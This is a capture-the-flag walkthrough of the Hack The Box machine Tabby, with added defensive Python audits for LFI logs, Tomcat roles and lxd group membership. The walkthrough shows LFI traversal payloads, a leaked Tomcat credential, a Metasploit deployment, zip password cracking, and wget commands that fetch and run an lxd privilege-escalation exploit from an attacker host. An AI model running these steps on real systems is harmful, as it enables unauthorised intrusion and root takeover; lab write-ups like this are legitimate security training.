In this article, we will go through a retired machine on Hack The Box called Tabby.
We will run an nmap scan on the IP address to discover open ports and their versions.
nmap -sV -oN portscan.log 10.10.10.194
Contents of portscan.log:
# Nmap 7.91 scan initiated Sun Nov 15 23:26:28 2020 as: nmap -sV -oN portscan.log 10.10.10.194
Nmap scan report for megahosting.htb (10.10.10.194)
Host is up (0.18s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
8080/tcp open http Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Nov 15 23:26:58 2020 -- 1 IP address (1 host up) scanned in 30.35 seconds
We can see two HTTP ports open, 80 and 8080, which we will check individually.
On port 80, we find the following website:
We can see a contact email address on the megahosting.htb domain. Add the IP address 10.10.10.194 and the host name megahosting.htb to the file /etc/hosts.
If we go to the ‘NEWS’ section, we are taken to a web page whose URL contains a ‘file’ parameter with the value ‘statement’. We can check whether the parameter is vulnerable to Local File Inclusion (LFI) by passing the value ‘../../../../etc/passwd’. We get the contents of the /etc/passwd file in the response.
Now we need to find out which file can be accessed in order to obtain any sensitive information. Let’s check what we have on Port 8080.
It says that CATALINA_HOME is /usr/share/tomcat9 and that users are defined in /etc/tomcat9/tomcat-users.xml. The file tomcat-users.xml is the one we are interested in, but either the directory is wrong or we don’t have permission to view the file in that directory. In such scenarios, I use GitHub to see which files I can access. The Apache Tomcat version used by the website is 9.0.31, so we can go to GitHub, search for the tomcat repository and check the files present in version 9.0.x. Click here to go to the repository.
I searched for tomcat-users.xml within the repository and found one at /conf path.
I changed the parameter value to ‘../../../../usr/share/tomcat9/conf/tomcat-users.xml’, but I still didn’t get any response. Next thing I did was to run wfuzz and look for any alternative directories where the tomcat-users.xml might be located.
wfuzz -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hl 0 http://megahosting.htb/news.php?file=/../../../../usr/share/tomcat9/FUZZ/tomcat-users.xml | tee wfuzz.log
The tee command after the pipe is optional. The --hl 0 filter hides all empty responses (those with zero lines).
We see that we get a non-zero length for the value ‘etc’, so the new path becomes ‘/usr/share/tomcat9/etc/tomcat-users.xml’. This renders as a blank page, but on viewing the page source we get the following:
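The LFI probing above (traversal in the ‘file’ parameter, including the wfuzz run against tomcat-users.xml) leaves a clear trace in the web server’s access log. The following is an added example, not part of the original writeup: a small Python detector that runs over constructed Apache access log lines and flags requests whose ‘file’ parameter contains path traversal, decoding the value repeatedly so that URL-encoded and double-encoded variants are caught too.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample Apache access log lines modelled on the probing described
# above; the client IP, timestamps and sizes are made up for illustration.
SAMPLE_LOG = """\
10.10.14.150 - - [15/Nov/2020:23:30:01 +0000] "GET /news.php?file=statement HTTP/1.1" 200 1532
10.10.14.150 - - [15/Nov/2020:23:30:07 +0000] "GET /news.php?file=../../../../etc/passwd HTTP/1.1" 200 2109
10.10.14.150 - - [15/Nov/2020:23:30:12 +0000] "GET /news.php?file=..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 2109
10.10.14.150 - - [15/Nov/2020:23:31:40 +0000] "GET /news.php?file=/../../../../usr/share/tomcat9/etc/tomcat-users.xml HTTP/1.1" 200 1277
10.10.14.150 - - [15/Nov/2020:23:32:00 +0000] "GET /index.php HTTP/1.1" 200 4001
"""

# Common Log Format: ip ident user [timestamp] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)


def fully_decode(value, rounds=3):
    """URL-decode repeatedly (bounded) so double-encoded traversal is not missed."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_traversal(value):
    """True if the decoded value climbs directories or names an absolute path."""
    v = fully_decode(value).replace("\\", "/")
    return "../" in v or v.startswith("/")


def find_lfi_attempts(log_text, params=("file",)):
    """Return (ip, timestamp, param, decoded value, status) for each suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        # parse_qs decodes one layer of URL encoding for us
        query = parse_qs(urlsplit(m.group("target")).query, keep_blank_values=True)
        for param in params:
            for raw in query.get(param, []):
                if is_traversal(raw):
                    hits.append((m.group("ip"), m.group("ts"), param,
                                 fully_decode(raw), int(m.group("status"))))
    return hits
```

A 200 status on a traversal request is the case worth alerting on first; a matching fix on the application side is to map the ‘file’ parameter onto an allow-list of known page names rather than including it as a path.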
The username is ‘tomcat’ and the password is ‘$3cureP4s5w0rd123!’. Now go to the web page on port 8080 and access the host-manager webapp link. Enter the obtained credentials.
A quick Google search can be done to learn about exploits related to this manager. Click here for the exploit that I used.
Open Metasploit and configure the parameters.
Make sure that the path is changed to /manager/text and the target is set as 1.
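The reason the leaked credentials are so valuable is the roles attached to the ‘tomcat’ user in tomcat-users.xml: the text interface at /manager/text that the module above uses needs the manager-script role, and the host-manager app needs the admin-* roles. As an added example (not from the writeup), here is a Python audit that parses a tomcat-users.xml file and lists every account holding a privileged role; the sample file and its password value are constructed placeholders.

```python
import xml.etree.ElementTree as ET

# Tomcat roles that grant deploy or configuration rights, and what each unlocks.
# manager-script is the role behind /manager/text; admin-* control host-manager.
PRIVILEGED_ROLES = {
    "manager-gui": "manager web UI (deploy/undeploy applications)",
    "manager-script": "manager text interface at /manager/text (scripted deploy)",
    "manager-jmx": "JMX proxy through the manager application",
    "admin-gui": "host-manager web UI (create virtual hosts)",
    "admin-script": "host-manager text interface",
}

# Constructed sample in the layout of a Debian tomcat9 users file.
# The password is a placeholder, not a value taken from any real system.
SAMPLE_USERS_XML = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="admin-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="PLACEHOLDER" roles="admin-gui,manager-script"/>
  <user username="monitor" password="PLACEHOLDER" roles="manager-status"/>
</tomcat-users>
"""


def local_name(tag):
    """Strip the XML namespace so files with or without xmlns parse the same."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text):
    """Return one finding per user holding a privileged role."""
    root = ET.fromstring(xml_text)
    findings = []
    for el in root.iter():
        if local_name(el.tag) != "user":
            continue
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        risky = sorted(roles & set(PRIVILEGED_ROLES))
        if risky:
            findings.append({
                "user": el.get("username", ""),
                "roles": risky,
                "grants": [PRIVILEGED_ROLES[r] for r in risky],
            })
    return findings
```

On a hardened install the file itself should also not be readable by the web server account that serves the LFI-affected site, which is the condition that let it be read here.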
Type run to obtain a meterpreter session. On listing the contents in the directory ‘/var/www/html/files’, we can see a zip file called 16162020_backup.zip.
Download the zip using the download command to the desired directory.
The file seems to be password protected. We can use fcrackzip to crack the zip password.
fcrackzip -uDp ~/Desktop/rockyou.txt 16162020_backup.zip | tee zip-file.log
The tee command after the pipe is optional. Make sure that the wordlist path is correct. I like to keep the rockyou.txt file on my Desktop.
The cracked password is ‘admin@it’. However, the zip file doesn’t contain anything useful. Let’s move on to the meterpreter session and see what else is available.
Use ‘shell -t’ to get a bash shell session. On listing the contents of the ‘/home’ directory, we can see a directory called ‘ash’. We currently do not have permission to view that directory. If we try to switch to user ‘ash’ with the password ‘admin@it’ (pure guesswork, i.e. password reuse), we see that we are authenticated as the user ‘ash’.
The output of the id command contains some interesting information which we will address pretty soon. For now, let’s see the contents of ‘user.txt’ file in the home directory of user ash.
After obtaining the user flag, let’s proceed to obtain the root flag. On using the ‘id’ command we can see that the user ash belongs to the group lxd. If you ever see lxd, there is a good chance that it is vulnerable to privilege escalation. I searched for the exploit which can be found here.
Follow the steps given in the above link. After successfully building the alpine image (I renamed alpine-v3.12-x86_64-20201115.tar.gz to alpine.tar.gz for simplicity) and storing the contents of the script in a file called exploit.sh, we can proceed to upload the files to the target machine.
Use python to create an http server:
python -m SimpleHTTPServer
Go to the target machine and run the following commands one by one:
wget http://10.10.14.150:8000/alpine.tar.gz
wget http://10.10.14.150:8000/exploit.sh
chmod 775 exploit.sh
./exploit.sh -f alpine.tar.gz
Then run the container using lxc command:
lxc start privesc
lxc exec privesc /bin/bash
The root.txt file is under /mnt/root/root directory. This is our root flag.
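The root cause of the escalation above is that ‘ash’ is a member of the lxd group, which on a default install is effectively equivalent to root. As an added example (not part of the writeup), the following Python audit parses /etc/group content and reports every user placed in a root-equivalent group so that such memberships can be reviewed like sudo access; the group file excerpt is constructed to mirror the target.

```python
# Constructed /etc/group excerpt modelled on the target described above:
# the user 'ash' is a member of lxd, which is what the escalation relies on.
SAMPLE_GROUP_FILE = """\
root:x:0:
adm:x:4:syslog,ash
sudo:x:27:
www-data:x:33:
lxd:x:116:ash
ash:x:1000:
tomcat:x:997:
"""

# Membership in these groups lets a user reach root without a password prompt
# (lxd/docker via a privileged container, disk via raw device access, sudo/wheel
# by design). Treat them as privileged and review them like sudoers.
ROOT_EQUIVALENT_GROUPS = {"lxd", "docker", "sudo", "wheel", "disk"}


def parse_group_file(text):
    """Map group name -> set of supplementary members from /etc/group content."""
    groups = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) < 4:
            continue  # malformed line; skip rather than crash the audit
        name, members = parts[0], parts[3]
        groups[name] = {m for m in members.split(",") if m}
    return groups


def audit_root_equivalent_groups(text):
    """Return {user: sorted list of root-equivalent groups they belong to}."""
    findings = {}
    for group, members in parse_group_file(text).items():
        if group in ROOT_EQUIVALENT_GROUPS:
            for user in members:
                findings.setdefault(user, []).append(group)
    return {user: sorted(groups) for user, groups in findings.items()}
```

The fix for a finding is to remove the membership (and, for lxd, to run the daemon with unprivileged containers only) rather than to rely on the user’s password strength, since the escalation here needed no further credential.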